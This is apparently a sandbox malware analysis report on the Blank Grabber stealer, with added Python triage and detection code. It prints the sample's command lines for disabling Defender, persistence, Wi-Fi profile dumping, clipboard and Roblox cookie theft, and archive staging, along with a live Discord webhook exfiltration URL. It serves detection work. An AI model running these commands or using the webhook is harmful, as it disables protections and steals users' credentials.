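    "defense-evasion": {"defender-exclusion", "defender-disable", "encoded-powershell",
                        "execution-policy-bypass", "hosts-file-attrib-change"},
    "discovery": {"av-product-discovery"},
    "persistence": {"startup-folder-persistence"},
    "collection": {"wlan-profile-dump", "clipboard-capture", "registry-secret-read"},
    "staging": {"password-protected-archive"},
}

# PowerShell accepts -EncodedCommand, -enc, -ec and -e; the value is base64 of UTF-16LE text.
ENC_RX = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script for an encoded PowerShell command line, else None."""
    m = ENC_RX.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> dict:
    """Tag one command line, scanning the decoded payload too when one is present."""
    tags = {name for name, rx in PATTERNS.items() if rx.search(cmdline)}
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags |= {name for name, rx in PATTERNS.items() if rx.search(decoded)}
    return {"cmdline": cmdline, "decoded": decoded, "tags": sorted(tags)}


def summarize(cmdlines) -> dict:
    """Aggregate tags across a process tree and rate it by how many stages are hit."""
    all_tags = set()
    for cmdline in cmdlines:
        all_tags.update(triage(cmdline)["tags"])
    stages = sorted(s for s, members in STAGES.items() if all_tags & members)
    verdict = "high" if len(stages) >= 3 else "medium" if len(stages) == 2 else "low"
    return {"tags": sorted(all_tags), "stages": stages, "verdict": verdict}


# Sample input: command lines copied from the process tree in the report above.
SAMPLE_CMDLINES = [
    r'''C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'"''',
    r'''powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend''',
    r'''"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All''',
    r"""powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'""",
    r'''WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName''',
    r'''netsh wlan show profile''',
    r'''powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY''',
    r'''attrib -r C:\Windows\System32\drivers\etc\hosts''',
    r'''C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *''',
    r'''tasklist /FO LIST''',
]

# Constructed stand-in for the report's long encoded screenshot command: same flags, short body.
SAMPLE_ENCODED = ("powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
                  + encode_command("Get-Clipboard"))

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES + [SAMPLE_ENCODED]:
        result = triage(line)
        print(result["tags"], "<-", line[:70])
    print(summarize(SAMPLE_CMDLINES + [SAMPLE_ENCODED]))
```

The decode step matters more than the pattern list: the Sigma hits in this report fire on the `-EncodedCommand` flag alone, while scanning the decoded text is what lets the same rule set see the `Get-Clipboard`, `Add-Type` or `CopyFromScreen` that the encoding hides.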
Malware configuration (extracted; the Discord webhook is the exfiltration endpoint): {"C2 url": "https://discord.com/api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-TjaVqNzNpf_yEZ3AJvNBM"}
Yara matches (Source | Rule | Description | Author; the Strings column is empty for every match)
C:\Users\user\AppData\Local\Temp\_MEI73082\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000001.00000003.2102475831.000001B5FEEF0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000001.00000002.2105351723.000001B5FDA10000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000000.00000003.1707785964.000002641A645000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000000.00000003.1707785964.000002641A643000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
(5 further memory-dump matches not shown on this page)

              System Summary

Sigma matches (Source; Author; Data)
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\program.exe", ParentImage: C:\Users\user\Desktop\program.exe, ParentProcessId: 7324, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'", ProcessId: 7376, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\program.exe", ParentImage: C:\Users\user\Desktop\program.exe, ParentProcessId: 7324, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7384, ProcessName: cmd.exe
Source: Process started; Author: @ROxPinTeddy; Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\program.exe", ParentImage: C:\Users\user\Desktop\program.exe, ParentProcessId: 7324, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *", ProcessId: 7864, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\program.exe, ProcessId: 7324, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\program.exe", ParentImage: C:\Users\user\Desktop\program.exe, ParentProcessId: 7324, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 8136, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\program.exe", ParentImage: C:\Users\user\Desktop\program.exe, ParentProcessId: 7324, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'", ProcessId: 7376, ProcessName: cmd.exe
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\Desktop\program.exe, ProcessId: 7324, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\program.exe, ProcessId: 7324, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\Desktop\program.exe, ProcessId: 7324, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8260, TargetFilename: C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline
Source: Process started; Author: Timur Zinniatullin, E.M. Anhaus, oscd.community; Data: Command: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7864, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *, ProcessId: 8568, ProcessName: rar.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7512, ProcessName: powershell.exe

              Data Obfuscation

              Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand ...

              Stealing of Sensitive Information

              Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\program.exe", ParentImage: C:\Users\user\Desktop\program.exe, ParentProcessId: 7324, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 1832, ProcessName: cmd.exe
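              The Sigma hits listed in this report (Defender tampering through Set-MpPreference, Add-MpPreference and MpCmdRun; encoded PowerShell run with -ExecutionPolicy Bypass; the password-protected rar archive; the csc.exe compile from a Temp path under Data Obfuscation; the Startup folder drop; and the netsh wlan enumeration under Stealing of Sensitive Information) can be replayed as detection logic over the same events. The following is an added example, not part of the Joe Sandbox output or of the Sigma rules it cites. The events are reconstructed from the command lines quoted in the report; the base64 payload of the encoded-command event is constructed here because the report elides the real one, and the rule names and the Event field subset are the author's own choices.

```python
"""Detection checks over process- and file-creation events reconstructed from
the Sigma hits in this report.  Added example, not sandbox output.  Field names
follow the report (Image, CommandLine, ParentCommandLine, TargetFilename); the
encoded PowerShell payload is constructed because the report elides it."""
import base64
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class Event:
    image: str                      # Image / NewProcessName
    command_line: str = ""          # CommandLine (empty for file-creation events)
    parent_command_line: str = ""   # ParentCommandLine
    target_filename: str = ""       # TargetFilename (Sysmon EventID 11)


# Set-MpPreference switches that each turn off one Defender protection component.
DEFENDER_DISABLE = ("-disablerealtimemonitoring", "-disableioavprotection",
                    "-disablescriptscanning", "-disableintrusionpreventionsystem")
STARTUP_DIR = "\\start menu\\programs\\startup\\"
STARTUP_EXTS = ("scr", "exe", "lnk", "bat", "vbs", "ps1")
RAR_PASSWORD = re.compile(r'(?:^|\s)-hp"?([^"\s]+)"?')   # -hp also encrypts file names
ENCODED_PS = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand / -enc, or None."""
    m = ENCODED_PS.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(ev: Event) -> list:
    """Return (rule, evidence) pairs for one event."""
    hits = []
    cl, low, img = ev.command_line, ev.command_line.lower(), ev.image.lower()
    lineage = (ev.command_line + " " + ev.parent_command_line).lower()
    if "set-mppreference" in low and any(f in low for f in DEFENDER_DISABLE):
        hits.append(("defender_protection_disabled", cl))
    if "add-mppreference" in low and "-exclusionpath" in low:
        hits.append(("defender_exclusion_added", cl))
    if "mpcmdrun" in lineage and "-removedefinitions" in lineage:   # only visible in the parent here
        hits.append(("defender_signatures_removed", ev.parent_command_line or cl))
    script = decode_encoded_command(cl)
    if script is not None and "-executionpolicy bypass" in low:
        hits.append(("encoded_powershell_bypass", script))
    if img.endswith("rar.exe") and (m := RAR_PASSWORD.search(cl)):
        hits.append(("rar_password_archive", m.group(1)))
    if "netsh wlan show profile" in low:
        hits.append(("wlan_profile_enumeration", cl))
    if "get-clipboard" in low:
        hits.append(("clipboard_capture", cl))
    if img.endswith("csc.exe") and "\\appdata\\local\\temp\\" in low:
        hits.append(("csc_compile_from_temp", cl))
    tf = ev.target_filename.lower()
    if STARTUP_DIR in tf and tf.rsplit(".", 1)[-1] in STARTUP_EXTS:
        hits.append(("startup_folder_persistence", ev.target_filename))
    return hits


def fired_rules(events) -> dict:
    """Map rule name -> list of evidence across a batch of events."""
    out: dict = {}
    for ev in events:
        for rule, evidence in detect(ev):
            out.setdefault(rule, []).append(evidence)
    return out


SET_MP = ("powershell Set-MpPreference -DisableIntrusionPreventionSystem $true "
          "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true "
          "-DisableScriptScanning $true -EnableControlledFolderAccess Disabled "
          "-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled "
          "-SubmitSamplesConsent NeverSend")
CONSTRUCTED_PAYLOAD = base64.b64encode("Write-Output 'constructed'".encode("utf-16-le")).decode()
# Command lines quoted from the report; only the encoded payload is constructed.
EVENTS = [
    Event(r"C:\Windows\System32\cmd.exe", r'C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"'),
    Event(r"C:\Windows\System32\cmd.exe",
          r'''C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'"'''),
    Event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", SET_MP,
          r'C:\Windows\system32\cmd.exe /c "' + SET_MP + r' && powershell Set-MpPreference '
          r'-SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"'),
    Event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + CONSTRUCTED_PAYLOAD),
    Event(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
          r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline"'),
    Event(r"C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe",
          r'C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *'),
    Event(r"C:\Windows\System32\cmd.exe", r'C:\Windows\system32\cmd.exe /c "netsh wlan show profile"'),
    Event(r"C:\Users\user\Desktop\program.exe",
          target_filename=r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr"),
    Event(r"C:\Users\user\Desktop\program.exe",   # directory itself: must not fire
          target_filename=r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"),
]

if __name__ == "__main__":
    for rule, evidence in sorted(fired_rules(EVENTS).items()):
        print(f"{rule:30} {evidence[0][:90]}")
```

              The MpCmdRun check looks at the parent command line as well, because in this report the definition wipe is only visible in the cmd.exe chain, never in the PowerShell process's own command line; the rar check extracts the archive password from -hp so an analyst can open the staged archive, and the Startup rule keys on the file extension rather than the name, which is why the blank-named " .scr" still matches while the directory creation does not.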
              No Suricata rule has matched


              AV Detection

              Source: program.exe.7324.1.memstrmin; Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-TjaVqNzNpf_yEZ3AJvNBM"}
              Source: program.exe; ReversingLabs: Detection: 44%
              Source: program.exe; Virustotal: Detection: 46%
              Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe; Code function: 83_2_00007FF64FE6901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext
              Source: program.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: \t5.pdbj source: powershell.exe, 0000002A.00000002.1989050806.000001E9C9F48000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: program.exe, 00000001.00000002.2116621230.00007FFDFAF07000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: program.exe, 00000001.00000002.2117447704.00007FFDFB36A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: program.exe, 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != 
NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: program.exe, 00000000.00000003.1704155388.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2123042345.00007FFE1A464000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: program.exe, 00000001.00000002.2117447704.00007FFDFB2D2000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: program.exe, 00000000.00000003.1704155388.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2123042345.00007FFE1A464000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: program.exe, program.exe, 00000001.00000002.2117447704.00007FFDFB36A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.pdbhPE source: powershell.exe, 0000002A.00000002.1908908412.000001E9B2165000.00000004.00000800.00020000.00000000.sdmp
